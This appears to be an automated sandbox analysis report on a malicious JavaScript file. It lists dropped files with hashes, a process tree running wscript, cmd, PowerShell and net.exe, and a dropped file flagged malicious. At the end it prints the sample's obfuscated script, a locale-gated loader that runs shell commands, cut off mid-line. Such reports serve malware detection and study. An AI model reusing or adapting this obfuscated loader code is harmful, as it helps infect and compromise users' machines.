MD5: | AED6F8D8CA3B42F4EB351EC1874A0AD9 |
SHA1: | 66ACEA890E306714F005B29E253A5F1F776F88C3 |
SHA-256: | 0672405C03BD96092A2BFAF256DECDCF031B2CA51ACADE52A11F9DF244DBE57E |
SHA-512: | 0969126C5A4336C2BF5CC8535E4AA96B8931212055A49512A2B132A940EDE645CCB1E22E8B4242F7263145BFCCEF540E04673185968F81D690AE7C62AA889DB4 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.2655214134614505 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXldcq0MVoZcg1vRcR0YEDoAvJfshHHrPeUkwRe9:YvXKXQbZc0vIGUUUkee9 |
MD5: | 7EE30F8177563593F6D57CF2B487BDD3 |
SHA1: | F9BFFF1FAD110AAF65EB131C80C2AE11810EA930 |
SHA-256: | 798F5FC3EAB335AD7B0DC0C41A46F86A447CCBE966BF9018F629A8B6F145405F |
SHA-512: | D58AF70CFA441473044B9E8D9E220661F4BA500320AB8F4DECB19FF2E8E8E6173C8E55A7079EC15227C8AB775D97B20F85202ABB8BD4E190C401A3911E5CF11F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.287300467355867 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXldcq0MVoZcg1vRcR0YEDoAvJTqgFCrPeUkwRe9:YvXKXQbZc0vIGTq16Ukee9 |
MD5: | 1B1C9DC5C3174E736B35B1743BFD6991 |
SHA1: | 83D88DD204C9783DBFE53276E3F1A16E3BA2B2FE |
SHA-256: | BF731280EF900669043478ACF71083B6A2FF77F96A48AA692952BD9FBADE1C8D |
SHA-512: | 5C3A0AECF1DB90076A1946D5FBE5BB34D3EB752ABE47B7FD084CFB351BB489CC9C2B81054C58794E69560C741FFEF5137A1E59053A3D81D0248B3A24D877F725 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.135116517314553 |
Encrypted: | false |
SSDEEP: | 24:YCaf9aWVB5ayhvx1FmpKaem/jnjdJj0SpB92nw2LSrCZ1ROScb/XLp52TR9ZuR/t:YCa9VB5G9r/HjtMwtyROScb/X9MTR9AF |
MD5: | 2102590C439F148073F3FD236A0DED19 |
SHA1: | 7A745EC89F820C6D7BC093E8C0070805CF303977 |
SHA-256: | 250C0E16C778C4B919DFD5AFE319DD9F8C631359136F0CC9AB0FA174EA51A5BB |
SHA-512: | C20E9E6F5BCB747900A2A32A3DEDD7AB5A91DF125A274BDF5109386BCED6927268279EE380D5A98AE162F24082EF414D50CA4D30787A44B764277912D420BFCE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.1898561758238582 |
Encrypted: | false |
SSDEEP: | 48:TGufl2GL7msEHUUUUUUUUaVSvR9H9vxFGiDIAEkGVvpmh:lNVmswUUUUUUUU0+FGSIta |
MD5: | 8B0774D51BA62D74C9DB0B8BBA8EE409 |
SHA1: | 35D8F93882A63EDEB451C74B04A95BDB3735BD77 |
SHA-256: | EB79752D4C88412AA5EE2EB5B60B622155918E19EE71682916515C11DB1A670D |
SHA-512: | 08F847600BDECE0C172075422083F006DEB32864EEBFC1883F9BC135A3B737D93288C8A706BA4C344310E504B276FFAB561355BC1682E13E47498BC68301A0A2 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.6095461023600595 |
Encrypted: | false |
SSDEEP: | 48:7MtLKUUUUUUUUUUaNvR9H9vxFGiDIAEkGVv+vqFl2GL7msr:7jUUUUUUUUUUaFGSItgKVmsr |
MD5: | B4202C0252D2FCFAEDAFB7B9317921A6 |
SHA1: | 2AE5724CD973D2A5306211761DB842403742C75D |
SHA-256: | B9A4386B980B1BCDEA6D542E8A7EED277902D486978AD9CBF70661694941A395 |
SHA-512: | 3F7B35D513B4BD0370DADF4DCE7040A8B64AE66A2ACBA88EDB4094490E66E6A6E0D2FEE2167FB5D5B846E2E961C1027C09760053ED113E00A9A445A8FFE11857 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgYuX9+H+0blb5gllFKP+P16CuSYyu:6a6TZ44ADEHX9+H+1ll3I1SK |
MD5: | 5A5EB322D81F29E4D7EDA10D5F70858C |
SHA1: | 8E6C6DE6879298F6D4896679231E37109D98B021 |
SHA-256: | AE3850790121BCB3D5167A3658333E37EFAA1EB18E7EA2171843179890004696 |
SHA-512: | 0D6866A418929B8E40B80D3C811BC4E70A92E1E9F76E2C2C516103EB7D5BA1702E692BBFFC34C4A654991F8E0D8DC24296E580C08AE6E519791FBCD7CECDF802 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulxmH/lZ:NllUg |
MD5: | D904BDD752B6F23D81E93ECA3BD8E0F3 |
SHA1: | 026D8B0D0F79861746760B0431AD46BAD2A01676 |
SHA-256: | B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2 |
SHA-512: | 5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.480679440204275 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K88ClAlzlYH:Qw946cPbiOxDlbYnuRKdNJYH |
MD5: | D578D0C0A5C73DA202ACCEE2D184AE8B |
SHA1: | C0079DFF3DC5859E1B7F13960108E84E1745A138 |
SHA-256: | AB25DE593C4826E71FA1E2ACD47E1A2BC2EBAED0BCDD2B55C0F26FF700E6482C |
SHA-512: | B370801EC0C948E1285449D5A2814D3490C277D5E085CC4D1A91450F11AB5B976AB697FAADDE9AB0E4BC5AA8FE2C4BC39E59A56AF6459ACA2749756F0E6FBCA9 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-11 02-50-54-806.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.345946398610936 |
Encrypted: | false |
SSDEEP: | 384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW |
MD5: | 8947C10F5AB6CFFFAE64BCA79B5A0BE3 |
SHA1: | 70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778 |
SHA-256: | 4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485 |
SHA-512: | B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15090 |
Entropy (8bit): | 5.374497197669039 |
Encrypted: | false |
SSDEEP: | 384:1ndyFfzVC7aw0jzdZ4K3Kobi2ZAZtqKZP8O6goYvjHjDtShSD8e3O6W7Wre6gSeM:6vs |
MD5: | BC2B984CF3DF0637DA45E3774C1DC170 |
SHA1: | 9F74498F8B99CC1C85E49858E13B221F19E2B8A3 |
SHA-256: | 127279906623BF93E2F0DCC2BA5EF6FE4BF9E96F7F3BF2FDC219435AE2588C5E |
SHA-512: | 313D3279BF77F72AF901A9FAE4CCE8092FAC29413B1F26AE1ABE52667A05F3EA244702072512DCD0B2763D13944A929DDE2066CCEACB47A3E5977E569D5D9D95 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.385669364410641 |
Encrypted: | false |
SSDEEP: | 768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rf:j |
MD5: | 3F3E2A8B84C6EEA843209B4A8ABC1436 |
SHA1: | FB98FAB6D6F07263540D4D4898A22DA9FD069786 |
SHA-256: | 03255FE93840E640FE40B3420F550028AB0735DF6606E4D1939CB3E77380DC69 |
SHA-512: | E52DE9F4A03E8CB34C2031560B4B886D52C9CBBBA03293F24AEB6C9E163E8B8BE42C80DBE646FBB4E95FCE45401F666842A53C4F3A54C7B640BD1DEA92AA4C32 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru |
MD5: | 95F182500FC92778102336D2D5AADCC8 |
SHA1: | BEC510B6B3D595833AF46B04C5843B95D2A0A6C9 |
SHA-256: | 9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9 |
SHA-512: | D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo |
MD5: | A0CFC77914D9BFBDD8BC1B1154A7B364 |
SHA1: | 54962BFDF3797C95DC2A4C8B29E873743811AD30 |
SHA-256: | 81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685 |
SHA-512: | 74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.9135544283862975 |
TrID: | |
File name: | 1274513223711714673.js |
File size: | 20'270 bytes |
MD5: | d8b81efe1c0ec93fe9151d32b2d83692 |
SHA1: | bfc4a3875408edf459cdacf462a52f8f3adfcb74 |
SHA256: | 7ad63c5e07499414ed72bf54b769b1b92edfbc6f96016fbee0afd8bde649702f |
SHA512: | 44ab23d9ff07adb603f69a394baecab3c826a7d432135263d9d778bdd37d4e0fdcb69b398e677b0544f0b90a83b8ca0d0f94332fe7de70c26a6bda50a5db5b99 |
SSDEEP: | 384:XXejxaL+XlHUX3HCH6HCZK8++kjNx1c8UBUzhTeUPpm1TJmmO8NH9QBed9I1wpSc:XO1aL+X6XSHdZQ+VmmO8Sezl |
TLSH: | 8B9273C28A0AC21220EFB5A5579804D171F813B6C959676A04DF38CF9F39F6CA1F50BA |
File Content Preview: | function svoaoypf(){lzeanibqd=[1031,3079,5127,4103,2055,3072];var vccfp=this[qbkeifp+qfrwkzg+okulwjngy+ypibdzcyr+wuubs+kjeda+broqmqrr+twvnldmpt](this[daque+csikz+yzamvqfv+okulwjngy+cdclj+qbkeifp+twvnldmpt][gtxjav+okulwjngy+wuubs+qfrwkzg+twvnldmpt+wuubs+kd |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 02:50:46 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7cdf40000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 02:50:46 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff634b50000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 02:50:46 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 02:50:46 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 02:50:51 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6bc1b0000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 5 |
Start time: | 02:50:51 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff634b50000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 02:50:51 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6770a0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 02:50:52 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74bb60000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 8 |
Start time: | 02:50:52 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6eef20000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 02:50:52 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff74bb60000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function svoaoypf() { |
|
1 | lzeanibqd = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var vccfp = this[qbkeifp + qfrwkzg + okulwjngy + ypibdzcyr + wuubs + kjeda + broqmqrr + twvnldmpt] ( this[daque + csikz + yzamvqfv + okulwjngy + cdclj + qbkeifp + twvnldmpt][gtxjav + okulwjngy + wuubs + qfrwkzg + twvnldmpt + wuubs + kdqyaioun + bikkf + wlpdla + wuubs + yzamvqfv + twvnldmpt] ( daque + csikz + yzamvqfv + okulwjngy + cdclj + qbkeifp + twvnldmpt + wlszyw + csikz + snuddefs + wuubs + rtzvgpfu + rtzvgpfu ) [ptqovzp + wuubs + tfyiiewq + ptqovzp + wuubs + qfrwkzg + ninqykskn] ( xiisi + avybwys + fkadiapgw + xqxuydhyi + emtjxgpf + gtxjav + dljvo + ptqovzp + ptqovzp + fkadiapgw + nezrzb + mmxwdwiqw + emtjxgpf + dljvo + csikz + fkadiapgw + ptqovzp + xerdavi + gtxjav + rztttd + broqmqrr + twvnldmpt + okulwjngy + rztttd + rtzvgpfu + lwquvzhta + qmmqujc + qfrwkzg + broqmqrr + wuubs + rtzvgpfu + xerdavi + kjeda + broqmqrr + twvnldmpt + wuubs + okulwjngy + broqmqrr + qfrwkzg + twvnldmpt + cdclj + rztttd + broqmqrr + qfrwkzg + rtzvgpfu + xerdavi + bhuveqdrl + rztttd + yzamvqfv + qfrwkzg + rtzvgpfu + wuubs ), 16 ); |
|
3 | for ( zqlvj = 0 ; zqlvj < lzeanibqd[rtzvgpfu + wuubs + broqmqrr + tfyiiewq + twvnldmpt + snuddefs] ; ++ zqlvj ) | |
4 | { | |
5 | if ( vccfp == lzeanibqd[zqlvj] ) | |
6 | { | |
7 | vccfp = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( vccfp !== true ) | |
12 | this[daque + csikz + yzamvqfv + okulwjngy + cdclj + qbkeifp + twvnldmpt][hkitgzt + eeujcw + cdclj + twvnldmpt] ( ); | |
13 | this[daque + csikz + yzamvqfv + okulwjngy + cdclj + qbkeifp + twvnldmpt][gtxjav + okulwjngy + wuubs + qfrwkzg + twvnldmpt + wuubs + kdqyaioun + bikkf + wlpdla + wuubs + yzamvqfv + twvnldmpt] ( daque + csikz + yzamvqfv + okulwjngy + cdclj + qbkeifp + twvnldmpt + wlszyw + csikz + snuddefs + wuubs + rtzvgpfu + rtzvgpfu ) [okulwjngy + eeujcw + broqmqrr] ( yzamvqfv + gkhzb + ninqykskn + lwquvzhta + dingw + yzamvqfv + lwquvzhta + qbkeifp + rztttd + xdhvxm + wuubs + okulwjngy + ypibdzcyr + snuddefs + wuubs + rtzvgpfu + rtzvgpfu + wlszyw + wuubs + zsnzcqoo + wuubs + lwquvzhta + hfvnpps + gtxjav + rztttd + gkhzb + gkhzb + qfrwkzg + broqmqrr + ninqykskn + lwquvzhta + zczifpn + kjeda + broqmqrr + loyggy + rztttd + oyznegmj + wuubs + hfvnpps + daque + wuubs + bikkf + ptqovzp 